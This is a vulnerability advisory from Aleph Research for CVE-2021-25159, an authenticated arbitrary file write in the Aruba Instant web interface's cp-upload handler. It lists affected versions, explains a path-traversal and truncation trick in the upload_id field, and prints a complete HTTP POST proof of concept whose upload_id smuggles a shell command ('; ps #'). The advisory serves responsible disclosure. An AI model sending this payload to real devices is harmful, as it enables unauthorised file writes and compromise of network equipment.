Authenticated Arbitrary File Write via Web UI (cp-upload)

Aleph Research Advisory

Identifier

CVE-2021-25159

Severity

Moderate

Product

Aruba Instant

Vulnerable Versions

- Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below
- Aruba Instant 6.5.x: 6.5.4.18 and below
- Aruba Instant 8.3.x: 8.3.0.14 and below
- Aruba Instant 8.5.x: 8.5.0.11 and below
- Aruba Instant 8.6.x: 8.6.0.7 and below
- Aruba Instant 8.7.x: 8.7.1.1 and below

Technical Details

After creating “/tmp/oper_” directory with CVE-2021-25158 an attacker can create a fixed content file with an arbitrary name in any path.

When trying to upload a logo via swarm.cgi (cp-upload) a log file will be created with the format “/tmp/oper_%s.log”. The param upload_id will be formatted into the format string.

With upload_id == ‘/../../etc/httpd/test.txt’ the final string that will be built is ‘/tmp/oper_/../../etc/httpd/test.txt.log’. To upload an arbitrary file we can pad the filename with additional ‘/’ as separators until the buffer overflow and the .log will be opt-out.

POC:

POST /swarm.cgi HTTP/1.1
Host: IP:4343
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------126192314137246243462522101405
Content-Length: 961
Origin: https:// IP:4343
Connection: keep-alive
Referer: https:// IP:4343/
Cookie: sid=XXXXXXXXXXXXXXXXXXXX; login=undefined; password=undefined; userType=admin
Upgrade-Insecure-Requests: 1
 
-----------------------------126192314137246243462522101405
Content-Disposition: form-data; name="opcode"
 
cp-upload
-----------------------------126192314137246243462522101405
Content-Disposition: form-data; name="file_type"
 
logo
-----------------------------126192314137246243462522101405
Content-Disposition: form-data; name="upload_id"
 
/../../../etc/httpd/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'; ps #aaaaaaaaaaaaaaaaaaa.gz
-----------------------------126192314137246243462522101405
Content-Disposition: form-data; name="sid"
 
AAAAAAAAAA
-----------------------------126192314137246243462522101405
Content-Disposition: form-data; name="file"; filename="test"
Content-Type: application/octet-stream
 
AAAAAAAAAA
 
 
-----------------------------126192314137246243462522101405--

Timeline

09-Mar-21
: Public disclosure.
09-Mar-21
: Patch available.
03-Feb-21
: CVE-2021-25159 assigned.
22-Nov-20
: Reported.

Posts

Aruba in Chains: Chaining Vulnerabilities for Fun and Profit
By Itai Greenhut & Gal Zror,
15-Jul 2021

Credit

Itai Greenhut (@Gr33nh4t) of Aleph Research, HCL Technologies
Gal Zror (@waveburst) of Aleph Research, HCL Technologies

External References

Aruba Instant (IAP) Multiple Vulnerabilities